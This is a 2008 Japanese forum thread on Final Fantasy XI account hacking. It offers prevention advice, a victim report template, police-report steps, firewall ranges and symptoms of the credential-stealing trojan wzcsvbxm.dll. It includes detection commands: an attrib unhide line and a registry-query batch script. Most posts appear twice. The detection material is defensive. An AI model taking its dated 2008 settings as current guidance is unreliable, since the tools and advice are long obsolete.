●● RMT業者の垢ハックが多発している件35 ●●
1 :既にその名前は使われています:
■このスレの目的
1:予防と自衛の徹底周知
2:被害報告の収集(※被害報告はテンプレを使用してください)
3:罠サイトURIの収集
4:被害者が現れた場合に対処をアドバイスする
前スレ ●● RMT業者の垢ハックが多発している件34 ●●
http://changi.2ch.net/test/read.cgi/ogame/1217322965/
■アカウントハックは多様化しています
トラップサイトやツールのDLでハックウィルスに感染するだけではなく、一般的に使われるアプリケーション
ソフトの脆弱性(ぜいじゃくせい)を利用してハックウィルスに感染させようとする手口も現れました。
いままでのような危険なサイト・不審なサイトの閲覧あるいはトラップが仕掛けてあるリンクのクリックや
ツールをDLしてアカハックされる以上に、ごく一般的なサイトに行っただけでトラップをもらう可能性が高い
手口からの回避は、各ユーザーのインターネットへの安全性に対する危機意識の高さにかかっています。
★ハック対策、被害に遭ったときの対処は>>2-20あたり(レス番はズレる可能性があります)
★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください。
★次スレは950前後で宣言して立ててください
1:予防と自衛の徹底周知
2:被害報告の収集(※被害報告はテンプレを使用してください)
3:罠サイトURIの収集
4:被害者が現れた場合に対処をアドバイスする
前スレ ●● RMT業者の垢ハックが多発している件34 ●●
http://changi.2ch.net/test/read.cgi/ogame/1217322965/
■アカウントハックは多様化しています
トラップサイトやツールのDLでハックウィルスに感染するだけではなく、一般的に使われるアプリケーション
ソフトの脆弱性(ぜいじゃくせい)を利用してハックウィルスに感染させようとする手口も現れました。
いままでのような危険なサイト・不審なサイトの閲覧あるいはトラップが仕掛けてあるリンクのクリックや
ツールをDLしてアカハックされる以上に、ごく一般的なサイトに行っただけでトラップをもらう可能性が高い
手口からの回避は、各ユーザーのインターネットへの安全性に対する危機意識の高さにかかっています。
★ハック対策、被害に遭ったときの対処は>>2-20あたり(レス番はズレる可能性があります)
★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください。
★次スレは950前後で宣言して立ててください
|
|
|
2 :既にその名前は使われています:2008/08/04(月) 16:20:03 ID:IY5wsDOy
i,,.+ ''"´ ̄ ̄ `"''|´\ _/|
| |,,.‐ ''"´ ̄ ̄ `"''|´\ _/| ユッサ
| |,.'^ァ'´ ', `ア⌒ヽ! | ユッサ
| / / , ヽ、_ i ',> |
| |.,' , / / / , ヽ.ヽ. i ∠| i | | ||
o |i ./ i /_,.ィ' ハ 、!,,_|__ハ ',!.| ', | !
。 ||. i |/レ' |/ V _レ' | .ト、',o ヽ. ゚
° ノ.| | ./ |'==、 '弋二iフ| , | iヽ. 。 ', これがほんとの垢ファック、なんつって
!ヘ!.|ハ,. |//// , ////| ハノ .| ', |
ト、 ,' i.ヽ! rー-‐、 u ,.レ' | i ', /./ /|
| ヽ, / i | .|>.、, ゝ ノ ,.イ | ! ハ ヽ! / |
| 、ノ\ヘ ,ハ| /_,.!ヘ`二ニ´,ヘ.|_| / / |ノ'´ヽ、_)|
', `,ア''´ ̄7:::| \/ |::::Y  ̄`ヽi /
. ヽ、'⌒/ i:::::|/}><{\|::::::i Y⌒/
,.ゝ〈 、 |:::::::ヽ、ムゝ'":::::::| _, 〉く、
∠_____,.ゝ,r'"`ヽ!:::::::::::::Yo::::::::::::!ァ'" `ヽィ'_____,,ゝ|
| i ', ';:::::::::::}:::::::::::::::/ /´ .| ||
|| | ', ',:::::::::i:o:::::::::/ / i| | ||
| |,,.‐ ''"´ ̄ ̄ `"''|´\ _/| ユッサ
| |,.'^ァ'´ ', `ア⌒ヽ! | ユッサ
| / / , ヽ、_ i ',> |
| |.,' , / / / , ヽ.ヽ. i ∠| i | | ||
o |i ./ i /_,.ィ' ハ 、!,,_|__ハ ',!.| ', | !
。 ||. i |/レ' |/ V _レ' | .ト、',o ヽ. ゚
° ノ.| | ./ |'==、 '弋二iフ| , | iヽ. 。 ', これがほんとの垢ファック、なんつって
!ヘ!.|ハ,. |//// , ////| ハノ .| ', |
ト、 ,' i.ヽ! rー-‐、 u ,.レ' | i ', /./ /|
| ヽ, / i | .|>.、, ゝ ノ ,.イ | ! ハ ヽ! / |
| 、ノ\ヘ ,ハ| /_,.!ヘ`二ニ´,ヘ.|_| / / |ノ'´ヽ、_)|
', `,ア''´ ̄7:::| \/ |::::Y  ̄`ヽi /
. ヽ、'⌒/ i:::::|/}><{\|::::::i Y⌒/
,.ゝ〈 、 |:::::::ヽ、ムゝ'":::::::| _, 〉く、
∠_____,.ゝ,r'"`ヽ!:::::::::::::Yo::::::::::::!ァ'" `ヽィ'_____,,ゝ|
| i ', ';:::::::::::}:::::::::::::::/ /´ .| ||
|| | ', ',:::::::::i:o:::::::::/ / i| | ||
3 :既にその名前は使われています:2008/08/04(月) 16:20:23 ID:0brkH9mG
■リアルタイムで被害に遭われている方へ
不正アクセス被害への、スクエニの対応方法がが変わりました。「不正アクセスに関しては、インフォメーション
センターへのお電話ではなく、不正アクセス専用チャットサポートにてお問い合わせください」
不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
(スクエニ公式ページトップ = ttp://www.playonline.com/ff11/index.shtml)
まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり) http://ort.sakura.ne.jp/taisai/
FF11Warning(アカハックについての対策とか詳しく載ってます) http://miku.a.orn.jp/miku2/
FFIX Virus問題 まとめサイト(初心者さん向け) http://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★「巻き戻し情報」「スクエニ社に法的責任を!」や「誰が悪いかランキング」「被害者の会を作れ」は別スレでお願いします。
●● FF11垢ハック巻き戻し状況報告スレ ●●(←別スレ)
http://changi.2ch.net/test/read.cgi/ogame/1216987350/
不正アクセス被害への、スクエニの対応方法がが変わりました。「不正アクセスに関しては、インフォメーション
センターへのお電話ではなく、不正アクセス専用チャットサポートにてお問い合わせください」
不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
(スクエニ公式ページトップ = ttp://www.playonline.com/ff11/index.shtml)
まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり) http://ort.sakura.ne.jp/taisai/
FF11Warning(アカハックについての対策とか詳しく載ってます) http://miku.a.orn.jp/miku2/
FFIX Virus問題 まとめサイト(初心者さん向け) http://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★「巻き戻し情報」「スクエニ社に法的責任を!」や「誰が悪いかランキング」「被害者の会を作れ」は別スレでお願いします。
●● FF11垢ハック巻き戻し状況報告スレ ●●(←別スレ)
http://changi.2ch.net/test/read.cgi/ogame/1216987350/
4 :既にその名前は使われています:2008/08/04(月) 16:21:20 ID:0brkH9mG
■各種ソフトのアップデート報告について
スレ内を検索しやすいように各種ソフトのupdate情報のレスには符丁をつけておくことを推奨します。
・FlashPlayerなどAdobe系ソフト ・Firefoxなどブラウザ ・NoScriptなどアドオン
などの更新があったときには
※※各種ソフトウェアアップデート情報※※
またセキュリティホールに関するニュースが出たときには
※※セキュリティホール情報※※
を付けてみてください。
スレ内を検索しやすいように各種ソフトのupdate情報のレスには符丁をつけておくことを推奨します。
・FlashPlayerなどAdobe系ソフト ・Firefoxなどブラウザ ・NoScriptなどアドオン
などの更新があったときには
※※各種ソフトウェアアップデート情報※※
またセキュリティホールに関するニュースが出たときには
※※セキュリティホール情報※※
を付けてみてください。
5 :既にその名前は使われています:2008/08/04(月) 16:22:45 ID:0brkH9mG
----------アカハック被害報告用テンプレ(書ききれない場合は複数レスに分けて下さい)----------
●気付いた日時(アカハック被害に気付いた日時)
●不審なアドレスのクリックの有無(blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス、ドメインのドット(.)を○等で置き換える事。h抜き等は駄目)
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等)
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等)
●他人が貴方のPCを使う可能性の有無(Yes/No)
●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明
●ネットカフェの利用の有無:Yes/No
●使っているOS(SP等まで書く)
●使用ブラウザ(バージョン等まで分かれば書く)
●WindowsUpdateの有無(最終更新日、等)
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し)
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)
●その他のSecurty対策(Spybot S&D、ルータ、等)
●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
●スレログやテンプレを読んだか(Yes/No/今から読みます)
●hosts変更(有/無・有りの場合は最終更新は何時ごろか)
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか)
●その他情報・症状など(書ききれない場合は次レスで書いてください)
●気付いた日時(アカハック被害に気付いた日時)
●不審なアドレスのクリックの有無(blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス、ドメインのドット(.)を○等で置き換える事。h抜き等は駄目)
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等)
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等)
●他人が貴方のPCを使う可能性の有無(Yes/No)
●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明
●ネットカフェの利用の有無:Yes/No
●使っているOS(SP等まで書く)
●使用ブラウザ(バージョン等まで分かれば書く)
●WindowsUpdateの有無(最終更新日、等)
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し)
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)
●その他のSecurty対策(Spybot S&D、ルータ、等)
●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
●スレログやテンプレを読んだか(Yes/No/今から読みます)
●hosts変更(有/無・有りの場合は最終更新は何時ごろか)
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか)
●その他情報・症状など(書ききれない場合は次レスで書いてください)
6 :既にその名前は使われています:2008/08/04(月) 16:25:46 ID:0brkH9mG
■具体的な自衛策その1(詳細は「>>1」の FF11Warningさんのところをじっくり読まれることをお勧めします)
1:ウイルススキャンソフト(ウィルス駆除ソフト)を導入する。
2:Windows UpdateでWindowsを最新の状態にする。
3:ファイアウォールを有効にする。
有料ソフト等に同梱されているもの(同梱でなければ同じ会社から出ているもの)を使うか、フリーの
ファイアウォールソフトを探し導入する(2chカテゴリ「ネット関係」>「セキュリティ」板にフリーの
ファイアウォールソフトのスレッドがあります。「ファイアウォール」などの単語で検索してください)
4:PeerGuardian2(IPフィルタソフト)を導入する。
※リネージュ資料室からリンクされているHPにて配布されているPeerGuardian2日本語版がダウンロード
できない模様(8月4日報告)。メニューは同じなので日本語マニュアルページと解説HPみながら英語版で。
★PG2公式 = ttp://phoenixlabs.org/pg2/
★DLページ(日本語サイト) = ttp://cowscorpion.com/Firewall/PeerGuardian.html
★日本語マニュアル = ttp://www.dukedog.flnet.org/Library/PG2/PG_Guide.html
※設定方法はここから
★リネージュ資料室 ttp://lineage.paix.jp/guide/security/basic-ipfilter.html
★PG2導入解説動画(改訂版)ニコ動 ttp://www.nicovideo.jp/watch/nm2825098
5:Firefox、Opera、Safariなど、IE以外のウェブブラウザを使用する。
それぞれのブラウザにセキュリティホールが見つかることもあるので、アップデート情報には注意してください。
6:ネ実・mixi・ブログ等にある不審なURLを踏む場合は、まず「aguse.jp」や「ソースチェッカー」を使用する。
★aguse GATEWAY = ttp://www.aguse.jp/ ★ソースチェッカーオンライン = ttp://so.7walker.net/
1:ウイルススキャンソフト(ウィルス駆除ソフト)を導入する。
2:Windows UpdateでWindowsを最新の状態にする。
3:ファイアウォールを有効にする。
有料ソフト等に同梱されているもの(同梱でなければ同じ会社から出ているもの)を使うか、フリーの
ファイアウォールソフトを探し導入する(2chカテゴリ「ネット関係」>「セキュリティ」板にフリーの
ファイアウォールソフトのスレッドがあります。「ファイアウォール」などの単語で検索してください)
4:PeerGuardian2(IPフィルタソフト)を導入する。
※リネージュ資料室からリンクされているHPにて配布されているPeerGuardian2日本語版がダウンロード
できない模様(8月4日報告)。メニューは同じなので日本語マニュアルページと解説HPみながら英語版で。
★PG2公式 = ttp://phoenixlabs.org/pg2/
★DLページ(日本語サイト) = ttp://cowscorpion.com/Firewall/PeerGuardian.html
★日本語マニュアル = ttp://www.dukedog.flnet.org/Library/PG2/PG_Guide.html
※設定方法はここから
★リネージュ資料室 ttp://lineage.paix.jp/guide/security/basic-ipfilter.html
★PG2導入解説動画(改訂版)ニコ動 ttp://www.nicovideo.jp/watch/nm2825098
5:Firefox、Opera、Safariなど、IE以外のウェブブラウザを使用する。
それぞれのブラウザにセキュリティホールが見つかることもあるので、アップデート情報には注意してください。
6:ネ実・mixi・ブログ等にある不審なURLを踏む場合は、まず「aguse.jp」や「ソースチェッカー」を使用する。
★aguse GATEWAY = ttp://www.aguse.jp/ ★ソースチェッカーオンライン = ttp://so.7walker.net/
7 :既にその名前は使われています:2008/08/04(月) 16:28:05 ID:0brkH9mG
8 :既にその名前は使われています:2008/08/04(月) 16:28:42 ID:0brkH9mG
■具体的な自衛策その2
7:SecuniaPSI(各種アプリケーション・プラグインソフトが最新版であるかどうかをチェックするソフト)の導入。
★Secunia公式ページ = ttps://psi.secunia.com/
★SecuniaPSI RC3ダウンロードページ(日本語解説付き) = ttp://cowscorpion.com/Security/SecuniaPSI.html
8:プラグイン他、各種ソフトの更新
Flashplayer、Realplayer、Shockwaveplayer、Quicktime、Adobe Acrobat/ReaderなどのソフトはOSやブラウザの
更新と同じように更新を怠り無く。
★FlashPlayerのバージョン確認 = ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
最新(現在は 9.0.124.0)未満の場合
★Adobeアップデート ttp://www.adobe.com/jp/downloads/updates/ で更新するか
★Adobeダウンロード ttp://www.adobe.com/jp/downloads で最新版と入れ替えてください。
※FlashPlayerはウェブブラウザごとに更新する必要があります。IEとFx使用なら両方で更新しましょう。
9:HIPS(レジストリや設定ファイルの変更を監視するソフト)の導入。
Unleak・Spybot(Teatimer)などのレジストリ変更を監視してくれるソフトを入れておくと、今回のような
レジストリ改ざんで動作するウィルスに対して「レジストリが変更される前に変更を許可するかどうかを
問い合わせてくれる」ので「怪しい」と思った場合はそれを拒否することによってウィルスの活動を阻害し
症状の発症を食い止めてくれます。
★Unleak = ttp://soft3304.net/Unleak/ ★Spybot = ttp://www.spybot.info/jp/
※レジストリ(あるいはシステム)を監視するソフトは複数入れると動作に問題が出ますから注意です。
7:SecuniaPSI(各種アプリケーション・プラグインソフトが最新版であるかどうかをチェックするソフト)の導入。
★Secunia公式ページ = ttps://psi.secunia.com/
★SecuniaPSI RC3ダウンロードページ(日本語解説付き) = ttp://cowscorpion.com/Security/SecuniaPSI.html
8:プラグイン他、各種ソフトの更新
Flashplayer、Realplayer、Shockwaveplayer、Quicktime、Adobe Acrobat/ReaderなどのソフトはOSやブラウザの
更新と同じように更新を怠り無く。
★FlashPlayerのバージョン確認 = ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
最新(現在は 9.0.124.0)未満の場合
★Adobeアップデート ttp://www.adobe.com/jp/downloads/updates/ で更新するか
★Adobeダウンロード ttp://www.adobe.com/jp/downloads で最新版と入れ替えてください。
※FlashPlayerはウェブブラウザごとに更新する必要があります。IEとFx使用なら両方で更新しましょう。
9:HIPS(レジストリや設定ファイルの変更を監視するソフト)の導入。
Unleak・Spybot(Teatimer)などのレジストリ変更を監視してくれるソフトを入れておくと、今回のような
レジストリ改ざんで動作するウィルスに対して「レジストリが変更される前に変更を許可するかどうかを
問い合わせてくれる」ので「怪しい」と思った場合はそれを拒否することによってウィルスの活動を阻害し
症状の発症を食い止めてくれます。
★Unleak = ttp://soft3304.net/Unleak/ ★Spybot = ttp://www.spybot.info/jp/
※レジストリ(あるいはシステム)を監視するソフトは複数入れると動作に問題が出ますから注意です。
9 :既にその名前は使われています:2008/08/04(月) 16:29:44 ID:0brkH9mG
■警察への被害届け
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
都道府県警察本部のサイバー犯罪相談窓口等一覧 = ttp://www.npa.go.jp/cyber/soudan.htm
2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
(この段階を踏まずに直接所轄署に行くと「専門の窓口に連絡しろ」と言われてしまう可能性があります)
3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。
4:資料を持参して所轄の署に赴き「利用権の侵害」での被害を報告します。
「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが
家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
■警察へ行く際に持っていく・用意しておくもの(過去スレで実際に警察へ行った被害者のレスから抜粋)
持っていったもの
●身分証明、印鑑 ●スクエニの会社情報 ●HPのプリントアウトしたもの
●プレイオンラインサポセンの電話番号(受け答えしてくれたサポセンの人の名前も伝えるといいかも)
警察で聞かれたもの
●プレイオンラインのIDとパスワード ●キャラ名 ●犯行時間帯
●被害内容(なくなったゲーム内通貨・アイテム) ●プロバイダ
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
都道府県警察本部のサイバー犯罪相談窓口等一覧 = ttp://www.npa.go.jp/cyber/soudan.htm
2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
(この段階を踏まずに直接所轄署に行くと「専門の窓口に連絡しろ」と言われてしまう可能性があります)
3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。
4:資料を持参して所轄の署に赴き「利用権の侵害」での被害を報告します。
「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが
家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
■警察へ行く際に持っていく・用意しておくもの(過去スレで実際に警察へ行った被害者のレスから抜粋)
持っていったもの
●身分証明、印鑑 ●スクエニの会社情報 ●HPのプリントアウトしたもの
●プレイオンラインサポセンの電話番号(受け答えしてくれたサポセンの人の名前も伝えるといいかも)
警察で聞かれたもの
●プレイオンラインのIDとパスワード ●キャラ名 ●犯行時間帯
●被害内容(なくなったゲーム内通貨・アイテム) ●プロバイダ
10 :既にその名前は使われています:2008/08/04(月) 16:30:37 ID:0brkH9mG
■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
現在、上記に該当する既知のものはwzcsvbxm.dllを使う3種のみです。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると
設定が簡単になります。
空けているローカルポート TCP1024-65535 UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
現在、上記に該当する既知のものはwzcsvbxm.dllを使う3種のみです。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると
設定が簡単になります。
空けているローカルポート TCP1024-65535 UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)
11 :既にその名前は使われています:2008/08/04(月) 16:32:34 ID:0brkH9mG
ここまで一般テンプレ
なお、PG2の日本語版がDLできない件については、あちらサイトがメンテか
CGIサーバに不具合が出ている可能性もありますので、経過を見てください
以下「wzcsvbxm.dll」に対する臨時テンプレ
なお、PG2の日本語版がDLできない件については、あちらサイトがメンテか
CGIサーバに不具合が出ている可能性もありますので、経過を見てください
以下「wzcsvbxm.dll」に対する臨時テンプレ
12 :既にその名前は使われています:2008/08/04(月) 16:33:32 ID:0brkH9mG
■「wzcsvbxm.dll」への感染に関して
感染の前兆症状(報告があったもの) ※感染していると思われるPCの症状
1:Windows Updateがフリーズする。
2:POLを起動するとエラーが出る(2回目からは正常に起動)
3:シャットダウンに時間がかかるようになった(「コンピュータの電源を切る」が表示されるまでに2分以上かかる)
4:POLを起動するとsvshost.exeによるPOL.exe干渉警告が出る。
5:アプリケーションの追加と削除を選択して表示されるまでに時間がかかるようになった。
また、感染の確認方法として
スタートボタン(あるいはExplorerから)→「マイ コンピュータ」を右クリック→メニューから「管理」を実行
→「コンピュータの管理」ウィンドウの左のツリーから「サービスとアプリケーション」→「サービス」を選択。
選択したとき、右窓の「Automatic Updates」を選んで表示される説明が「Windowsの更新のダウンロードと〜」
のように日本語で表示されるかを確認。
トロイの木馬wzcsvbxm.dllは欧文の説明文を内部に持っているので、説明文が「Enables the download and 〜」に
なっていたら感染の疑いありです(System32フォルダ内にwzcsvbxm.dllがいないかどうか探してください)
感染の前兆症状(報告があったもの) ※感染していると思われるPCの症状
1:Windows Updateがフリーズする。
2:POLを起動するとエラーが出る(2回目からは正常に起動)
3:シャットダウンに時間がかかるようになった(「コンピュータの電源を切る」が表示されるまでに2分以上かかる)
4:POLを起動するとsvshost.exeによるPOL.exe干渉警告が出る。
5:アプリケーションの追加と削除を選択して表示されるまでに時間がかかるようになった。
また、感染の確認方法として
スタートボタン(あるいはExplorerから)→「マイ コンピュータ」を右クリック→メニューから「管理」を実行
→「コンピュータの管理」ウィンドウの左のツリーから「サービスとアプリケーション」→「サービス」を選択。
選択したとき、右窓の「Automatic Updates」を選んで表示される説明が「Windowsの更新のダウンロードと〜」
のように日本語で表示されるかを確認。
トロイの木馬wzcsvbxm.dllは欧文の説明文を内部に持っているので、説明文が「Enables the download and 〜」に
なっていたら感染の疑いありです(System32フォルダ内にwzcsvbxm.dllがいないかどうか探してください)
13 :既にその名前は使われています:2008/08/04(月) 16:34:41 ID:0brkH9mG
■「wzcsvbxm.dll」がPCに存在するか調べる方法(1)
Explorerで検索する場合は「ツール→フォルダオプション→表示タブ」で「ファイルとフォルダの表示」が
「すべてのファイルとフォルダを表示する」の選択がされていることと「保護されたオペレーティングシステム
ファイルを表示しない(推奨)」のチェックを外してあることを確認。マイコンピュータ上で「右クリック→検索
→ファイルとフォルダすべて→詳細設定オプション」で「システムフォルダの検索」「隠しファイルとフォルダの
検索」「サブフォルダの検索」にチェックを入れて検索してください。
■「wzcsvbxm.dll」がPCに存在するか調べる方法(2)
コマンドプロンプト(スタート→プログラム→アクセサリにあります)を開いて、そこに
attrib %SystemRoot%\system32\wzcsvbxm.dll /s -s -h -r ←をコピペしてenter
存在しない場合 = 「ファイルが見つかりません-○:\WINDOWS\system32\wzcsvbxm.dll」(○はドライブ名)
存在する場合 = 何も表示されず次のコマンド受付状態になるので、System32フォルダを開いて探せば見つかります。
■「wzcsvbxm.dll」の検索結果について
1:wzcsvbxm.dllが「%SystemRoot%\system32」のディレクトリに見つからなければ、wzcsvbxm.dllに関しては
感染していません(%SystemRoot%はシステムがいるHDD上のディレクトリ表示。たとえばC:\WINDOWS)
2:wzcsvbxm.dllが「HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\」などに見つかった
場合、検索した履歴を保存しているだけなので放置して大丈夫です(HKEYと付くのはレジストリ)
Explorerで検索する場合は「ツール→フォルダオプション→表示タブ」で「ファイルとフォルダの表示」が
「すべてのファイルとフォルダを表示する」の選択がされていることと「保護されたオペレーティングシステム
ファイルを表示しない(推奨)」のチェックを外してあることを確認。マイコンピュータ上で「右クリック→検索
→ファイルとフォルダすべて→詳細設定オプション」で「システムフォルダの検索」「隠しファイルとフォルダの
検索」「サブフォルダの検索」にチェックを入れて検索してください。
■「wzcsvbxm.dll」がPCに存在するか調べる方法(2)
コマンドプロンプト(スタート→プログラム→アクセサリにあります)を開いて、そこに
attrib %SystemRoot%\system32\wzcsvbxm.dll /s -s -h -r ←をコピペしてenter
存在しない場合 = 「ファイルが見つかりません-○:\WINDOWS\system32\wzcsvbxm.dll」(○はドライブ名)
存在する場合 = 何も表示されず次のコマンド受付状態になるので、System32フォルダを開いて探せば見つかります。
■「wzcsvbxm.dll」の検索結果について
1:wzcsvbxm.dllが「%SystemRoot%\system32」のディレクトリに見つからなければ、wzcsvbxm.dllに関しては
感染していません(%SystemRoot%はシステムがいるHDD上のディレクトリ表示。たとえばC:\WINDOWS)
2:wzcsvbxm.dllが「HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\」などに見つかった
場合、検索した履歴を保存しているだけなので放置して大丈夫です(HKEYと付くのはレジストリ)
14 :既にその名前は使われています:2008/08/04(月) 16:36:08 ID:0brkH9mG
■「wzcsvbxm.dll」がPCに存在するか調べる方法(3)
「(このレスをコピペ)」と書いてあるレスをエディタにコピペして***.bat(***の部分はなんでも○)で
保存し、保存したらExplorer上からでもダブルクリック。
※テキストエディタにワードバットなどリッチテキストで保存できるエディタの場合、リッチテキスト形式で
ファイルを作って保存すると動きませんので、保存はテキストドキュメントで行ってください。
ダブルクリックなどで動作させたら、それが終わるまでに10秒ほどかかります。
「続行するには何かキーを押してください...」が出てくるまでお待ちください。
※これを実行した結果表示の★の部分になにも表示されないPC環境もあるようです。
他の検索方法を試してwzcsvbxm.dllがPC内にいるかいないかをあわせて確認してください。
「(このレスをコピペ)」と書いてあるレスをエディタにコピペして***.bat(***の部分はなんでも○)で
保存し、保存したらExplorer上からでもダブルクリック。
※テキストエディタにワードバットなどリッチテキストで保存できるエディタの場合、リッチテキスト形式で
ファイルを作って保存すると動きませんので、保存はテキストドキュメントで行ってください。
ダブルクリックなどで動作させたら、それが終わるまでに10秒ほどかかります。
「続行するには何かキーを押してください...」が出てくるまでお待ちください。
※これを実行した結果表示の★の部分になにも表示されないPC環境もあるようです。
他の検索方法を試してwzcsvbxm.dllがPC内にいるかいないかをあわせて確認してください。
15 :既にその名前は使われています:2008/08/04(月) 16:37:10 ID:0brkH9mG
@echo off && REM REG.EXE ver3.0 (このレスをコピペ)
for /L %%i in (1, 1, 9) do (reg query HKLM\SYSTEM\ControlSet00%%i > NUL 2>&1
if ERRORLEVEL 1 call :nai
if ERRORLEVEL 0 call :aru %%i)
for /L %%i in (10, 1, 99) do (reg query HKLM\SYSTEM\ControlSet0%%i > NUL 2>&1
if ERRORLEVEL 1 call :nai
if ERRORLEVEL 0 call :aru2 %%i)
reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
echo =========================================================================
sc qdescription wuauserv
pause
goto :EOF
:nai
exit /b -1
:aru
reg query HKLM\SYSTEM\ControlSet00%1\Services\wuauserv\Parameters
exit /b
:aru2
reg query HKLM\SYSTEM\ControlSet0%1\Services\wuauserv\Parameters
exit /b
for /L %%i in (1, 1, 9) do (reg query HKLM\SYSTEM\ControlSet00%%i > NUL 2>&1
if ERRORLEVEL 1 call :nai
if ERRORLEVEL 0 call :aru %%i)
for /L %%i in (10, 1, 99) do (reg query HKLM\SYSTEM\ControlSet0%%i > NUL 2>&1
if ERRORLEVEL 1 call :nai
if ERRORLEVEL 0 call :aru2 %%i)
reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
echo =========================================================================
sc qdescription wuauserv
pause
goto :EOF
:nai
exit /b -1
:aru
reg query HKLM\SYSTEM\ControlSet00%1\Services\wuauserv\Parameters
exit /b
:aru2
reg query HKLM\SYSTEM\ControlSet0%1\Services\wuauserv\Parameters
exit /b
16 :既にその名前は使われています:2008/08/04(月) 16:38:02 ID:0brkH9mG
■上記バッチファイルを実行した例(★の部分が違ってたらヤバイかも)
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★
=========================================================================
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: wuauserv
DESCRIPTION : Windows ←★
